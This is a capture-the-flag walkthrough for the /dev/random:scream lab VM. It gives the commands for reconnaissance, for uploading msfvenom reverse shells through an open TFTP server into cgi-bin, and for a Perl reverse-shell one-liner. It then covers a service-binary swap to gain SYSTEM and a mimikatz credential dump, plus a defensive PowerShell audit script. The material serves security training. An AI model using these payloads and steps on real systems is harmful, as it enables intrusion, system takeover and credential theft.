/dev/random:scream Walkthrough

Reconnaissance

Host Discovery

┌──(root㉿kali)-[~]
└─# nmap -sn 10.0.0.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 03:30 EDT
Nmap scan report for 10.0.0.131
Host is up (0.00036s latency).
MAC Address: 00:0C:29:62:2F:C7 (VMware)

Port Scanning

┌──(root㉿kali)-[~]
└─# nmap -p- -sS -sV -sC 10.0.0.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 03:30 EDT
Nmap scan report for 10.0.0.131
Host is up (0.00034s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     WAR-FTPD 1.65 (Name Scream XP (SP2) FTP Service)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 1 ftp ftp              0 Aug 19 15:50 bin
| drwxr-xr-x 1 ftp ftp              0 Aug 19 15:53 log
|_drwxr-xr-x 1 ftp ftp              0 Aug 19 15:50 root
|_ftp-bounce: bounce working!
22/tcp open  ssh     WeOnlyDo sshd 2.1.3 (protocol 2.0)
| ssh-hostkey:
|   1024 2c:23:77:67:d3:e0:ae:2a:a8:01:a4:9e:54:97:db:2c (DSA)
|_  1024 fa:11:a5:3d:63:95:4a:ae:3e:16:49:2f:bb:4b:f1:de (RSA)
23/tcp open  telnet
80/tcp open  http    Tinyweb httpd 1.93
|_http-server-header: TinyWeb/1.93
|_http-title: The Scream - Edvard Munch
MAC Address: 00:0C:29:62:2F:C7 (VMware)

Enumeration

FTP Enumeration

I log in with username: anonymous, password: [empty], and look through everything that is there.

┌──(root㉿kali)-[~]
└─# ftp 10.0.0.131
Connected to 10.0.0.131.
220- Scream XP (SP2) FTP Service WAR-FTPD 1.65 Ready
220 Please enter your user name.
Name (10.0.0.131:kali): anonymous
331 Password required for anonymous
Password: 
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||1033|)
150 Connection accepted
drwxr-xr-x 1 ftp ftp              0 Jul 22 15:02 bin
drwxr-xr-x 1 ftp ftp              0 Jul 22 15:05 log
drwxr-xr-x 1 ftp ftp              0 Jul 22 15:02 root
226 Transfer OK
ftp> cd /bin
250 CWD successful. "/bin" is current directory.
ftp> ls -la
229 Entering Extended Passive Mode (|||1034|)
150 Connection accepted
---------- 1 ftp ftp          12735 Jan 05  2006 CGITEST.ZIP
---------- 1 ftp ftp             69 Mar 31  2009 FILE_ID.DIZ
---------- 1 ftp ftp           2175 Mar 31  2009 LICENCE.TXT
---------- 1 ftp ftp             60 Jan 05  2006 README.TXT
---------- 1 ftp ftp         146091 Mar 31  2009 SRC.ZIP
---x--x--x 1 ftp ftp          68856 Mar 31  2009 TINY.EXE
226 Transfer OK
ftp> cd ../log
250 CWD successful. "/log" is current directory.
ftp> ls -la
229 Entering Extended Passive Mode (|||1035|)
150 Connection accepted
---------- 1 ftp ftp           4620 Jul 22 15:31 access_log
---------- 1 ftp ftp              0 Jul 22 15:05 agent_log
---------- 1 ftp ftp              0 Jul 22 15:05 error_log
---------- 1 ftp ftp            674 Nov 01  2012 OpenTFTPServerMT.log
---------- 1 ftp ftp              0 Jul 22 15:05 referer_log
226 Transfer OK
ftp> cd ../root
250 CWD successful. "/root" is current directory.
ftp> ls -la
229 Entering Extended Passive Mode (|||1036|)
150 Connection accepted
drwxr-xr-x 1 ftp ftp              0 Feb 08  2013 cgi-bin
---------- 1 ftp ftp          14539 Oct 31  2012 index.html
226 Transfer OK
ftp> cd cgi-bin
250 CWD successful. "/root/cgi-bin" is current directory.
ftp> ls -la
229 Entering Extended Passive Mode (|||1037|)
150 Connection accepted
226 Transfer OK
ftp> 

TINY.EXE is found in the /bin directory, which is probably related to the Tinyweb httpd service.

OpenTFTPServerMT.log is found in the /log directory, which suggests this machine may be running a TFTP server.

cgi-bin and index.html are found in the /root directory, which is probably the document root served by Tinyweb httpd.

I tried to enter the cgi-bin directory, but there is nothing in it.

I also tried to get the files, but was told I have no permission (the listing shows them as `----------`).

TFTP Enumeration

Here I did a quick test: I first created an empty test file and uploaded it over TFTP.

┌──(root㉿kali)-[~]
└─# touch tftp_via_test             
┌──(root㉿kali)-[~]
└─# tftp 10.0.0.131    
tftp> put tftp_via_test

I re-entered FTP and found the test file I had just uploaded in the root directory.

┌──(root㉿kali)-[~]
└─# ftp 10.0.0.131
Connected to 10.0.0.131.
220- Scream XP (SP2) FTP Service WAR-FTPD 1.65 Ready
220 Please enter your user name.
Name (10.0.0.131:kali): anonymous
331 Password required for anonymous
Password: 
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /root
250 CWD successful. "/root" is current directory.
ftp> ls -la
229 Entering Extended Passive Mode (|||1040|)
150 Connection accepted
drwxr-xr-x 1 ftp ftp              0 Feb 08  2013 cgi-bin
---------- 1 ftp ftp          14539 Oct 31  2012 index.html
---------- 1 ftp ftp              0 Jul 22 15:49 tftp_via_test
226 Transfer OK

Exploiting

Exploiting TFTP

Since the TFTP server writes directly into the web root, I used msfvenom to create a reverse TCP shell.

┌──(root㉿kali)-[~]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.129 LPORT=80 -e   x86/shikata_ga_nai -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: shell.exe

Upload it with TFTP; note that binary (octet) mode must be used here.

┌──(root㉿kali)-[~]
└─# tftp 10.0.0.131
tftp> binary
tftp> mode
Using octet mode to transfer files.
tftp> put shell.exe cgi-bin/shell.exe

Then use netcat to listen on the port.

┌──(root㉿kali)-[~]
└─# nc -v -l -p 80   
listening on [any] 80 ...

Finally, I used curl to request the executable, but nothing came back to the listener, so it can be concluded that the CGI handler does not execute .exe files.

┌──(root㉿kali)-[~]
└─# curl http://10.0.0.131/cgi-bin/shell.exe

I tried another reverse TCP payload.

┌──(root㉿kali)-[~]
└─# msfvenom -p cmd/windows/reverse_perl LHOST=10.0.0.129 LPORT=4444 -o shell.pl
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 143 bytes
Saved as: shell.pl

Because the generated payload is a one-liner meant to be run from cmd (perl -MIO -e "..."), it has to be rewritten as a plain Perl script before the CGI handler can execute it.

# original content
perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"10.0.0.129:4444\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"
# modified script
use IO::Socket::INET;$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.129:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;

Using the same method as above, upload the modified script; this time it executes successfully.

┌──(root㉿kali)-[~]
└─# nc -v -l -p 4444
listening on [any] 4444 ...
10.0.0.131: inverse host lookup failed: Unknown host
connect to [10.0.0.129] from (UNKNOWN) [10.0.0.131] 1046
dir
 Volume in drive C has no label.
 Volume Serial Number is 90EA-1E7C

 Directory of c:\www\root\cgi-bin

07/22/2024  04:43 PM    <DIR>          .
07/22/2024  04:43 PM    <DIR>          ..
07/22/2024  04:03 PM               324 shell.exe
07/22/2024  04:43 PM               148 shell.pl
               2 File(s)            472 bytes
               2 Dir(s)  40,106,590,208 bytes free
echo %username%
alex

Privilege Escalation

Since the Perl script only gives a basic shell, run the shell.exe uploaded earlier to start a second, proper cmd shell.

#perl shell
shell.exe

#kali linux
┌──(root㉿kali)-[~]
└─# nc -lvp 80 
listening on [any] 80 ...
10.0.0.131: inverse host lookup failed: Unknown host
connect to [10.0.0.129] from (UNKNOWN) [10.0.0.131] 1048
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

c:\www\root\cgi-bin>

Looking at the current process list, three services are found running with SYSTEM privileges.

c:\www\root\cgi-bin>tasklist /FI "username eq SYSTEM"
tasklist /FI "username eq SYSTEM"

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
......
FileZilla server.exe        1988 Console                 0      3,028 K
FreeSSHDService.exe         2020 Console                 0      4,384 K
OpenTFTPServerMT.exe         192 Console                 0      1,844 K

Next, I looked at the list of running services and was able to match these three processes to their service names:

c:\www\root\cgi-bin>net start
net start
These Windows services are started:
   ......
   FileZilla Server FTP server
   FreeSSHDService
   ......
   Open TFTP Server, MultiThreaded
   ......
   
The command completed successfully.

Here the FileZilla service is successfully stopped.

C:\Program Files\FileZilla Server>net stop "FileZilla Server FTP Server"
net stop "FileZilla Server FTP Server"
The FileZilla Server FTP server service is stopping.
The FileZilla Server FTP server service was stopped successfully.

With the service stopped, check whether the currently logged-in user can rename the service's target executable; the rename succeeds.

C:\Program Files\FileZilla Server>cd C:\Program Files\FileZilla Server

C:\Program Files\FileZilla Server>dir

***
02/26/2012  07:42 AM           632,320 FileZilla server.exe
***
               
C:\Program Files\FileZilla Server>move "FileZilla server.exe" "FileZilla server.exe.bak"

***
02/26/2012  07:42 AM           632,320 FileZilla server.exe.bak
***

C:\Program Files\FileZilla Server>move C:\www\root\cgi-bin\shell_bak.exe "FileZilla server.exe"

Use msfvenom once more to generate another reverse TCP shell, this time with the port set to 6657, and upload it the same way as before; I will not repeat those steps here.

Rename the uploaded file to FileZilla server.exe and start the service again; a SYSTEM shell is obtained.

#kali linux
┌──(root㉿kali)-[~]
└─# nc -lvp 6657 
listening on [any] 6657 ...

#TCP shell
C:\Program Files\FileZilla Server>move C:\www\root\cgi-bin\shell_bak.exe "FileZilla server.exe"
C:\Program Files\FileZilla Server>net start "FileZilla Server FTP Server"

#kali linux
┌──(root㉿kali)-[~]
└─# nc -lvp 6657 
listening on [any] 6657 ...
10.0.0.131: inverse host lookup failed: Unknown host
connect to [10.0.0.129] from (UNKNOWN) [10.0.0.131] 1054
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
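As an added defender-side check that is not part of the original walkthrough: the service-binary swap above works only because the logged-in user can rename files inside C:\Program Files\FileZilla Server. The PowerShell audit below, written for this post and assuming a current Windows host with Get-CimInstance, lists every service whose executable or containing directory grants write, modify, delete or full-control rights to low-privileged principals; any hit is a misconfiguration to fix before it becomes a SYSTEM shell.

```powershell
# Added audit example (not from the original post): find services whose binary
# or binary directory is writable by low-privileged principals.
$lowPriv = @('Everyone', 'BUILTIN\Users',
             'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl -bor
             [System.Security.AccessControl.FileSystemRights]::Delete -bor
             [System.Security.AccessControl.FileSystemRights]::WriteData

function Get-BinaryPath([string]$pathName) {
    # PathName may be quoted ("C:\Program Files\x\svc.exe" -arg) or bare with arguments
    if ($pathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($pathName -match '^(\S+\.exe)') { return $Matches[1] }
    return $pathName.Trim()
}

function Test-LowPrivWrite([string]$path) {
    # Returns the first low-privileged identity holding a write-class right, else $null.
    # Generic rights (large integers such as 268435456) are not decoded here.
    try { $acl = Get-Acl -LiteralPath $path -ErrorAction Stop } catch { return $null }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeMask) -ne 0) {
            return $ace.IdentityReference.Value
        }
    }
    return $null
}

Get-CimInstance Win32_Service | ForEach-Object {
    $exe    = Get-BinaryPath $_.PathName
    $dir    = Split-Path -Parent $exe
    $hit    = Test-LowPrivWrite $exe
    $dirHit = Test-LowPrivWrite $dir
    if ($hit -or $dirHit) {
        [pscustomobject]@{
            Service   = $_.Name
            RunsAs    = $_.StartName   # LocalSystem here means a SYSTEM shell on swap
            Binary    = $exe
            FileWrite = $hit
            DirWrite  = $dirHit
        }
    }
} | Format-Table -AutoSize
```

Run it elevated so every service's ACL can be read; a directory hit with RunsAs = LocalSystem is exactly the FileZilla condition exploited in this post.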

Finally, using the same TFTP upload method, upload mimikatz.exe and successfully recover the password.

C:\www\root>mimikatz.exe
mimikatz.exe

  .#####.   mimikatz 2.2.0 (x86) #19041 Sep 19 2022 17:43:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 47320 (00000000:0000b8d8)
Session           : Interactive from 0
User Name         : alex
Domain            : SCREAM
Logon Server      : SCREAM
Logon Time        : 7/22/2024 8:09:49 PM
SID               : S-1-5-21-1659004503-1482476501-725345543-1003
        msv :
         [00000002] Primary
         * Username : alex
         * Domain   : SCREAM
         * NTLM     : 504182f8417ed8557b67e96adc8b4d04
         * SHA1     : c84389be8e78f275c4530b00ba54aea1cbd347f7
        wdigest :
         * Username : alex
         * Domain   : SCREAM
         * Password : thisisaverylongpassword
        kerberos :
         * Username : alex
         * Domain   : SCREAM
         * Password : thisisaverylongpassword

This post is licensed under CC BY 4.0 by the author.